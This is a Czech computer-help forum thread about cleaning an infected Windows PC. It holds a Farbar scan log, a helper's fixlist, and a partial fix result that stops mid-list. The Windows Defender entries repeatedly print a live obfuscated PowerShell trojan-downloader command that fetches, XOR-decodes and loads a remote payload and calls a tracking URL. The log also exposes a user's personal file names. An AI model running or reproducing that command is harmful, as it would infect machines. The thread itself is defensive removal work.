FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

13-01-2021 21:32:33 Instalační služba modulů systému Windows

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (01/20/2021 08:00:00 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0


System errors:
=============
Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.


Windows Defender:
===================================
Date: 2021-01-20 19:28:36.8570000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2538.0, AS: 1.329.2538.0, NIS: 1.329.2538.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 18:14:17.7510000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2534.0, AS: 1.329.2534.0, NIS: 1.329.2534.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 17:09:21.2090000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2528.0, AS: 1.329.2528.0, NIS: 1.329.2528.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 15:18:54.2110000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {5BABBB36-9445-4077-8621-59FC0CF7C04A}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-20 11:15:09.7920000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2519.0, AS: 1.329.2519.0, NIS: 1.329.2519.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

==================== Memory info ===========================

BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 90%
Total physical RAM: 3767.05 MB
Available physical RAM: 356.34 MB
Total Virtual: 7351.05 MB
Available Virtual: 3556.64 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:111.19 GB) (Free:62.69 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:230.27 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32

\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=509 MB) - (Type=27)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==========================================================
Disk: 3 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)

==================== End of Addition.txt =======================

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 20:05
od Rudy
Otevřte poznámkový blok a zkopírujte do něj:
Start

CloseProcesses:
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
C:\WINDOWS\AutoKMS

EmptyTemp:
Hosts:
End
Uložte na plochu jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 20:21
od chenny
Fix result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 20:16:06) Run:1
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
